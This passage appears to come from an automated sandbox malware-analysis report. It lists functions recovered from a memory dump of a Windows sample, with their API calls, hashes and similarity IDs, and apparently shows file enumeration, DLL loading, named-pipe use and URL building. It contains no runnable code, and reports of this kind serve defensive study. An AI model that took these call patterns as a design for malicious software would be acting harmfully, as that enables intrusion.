  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
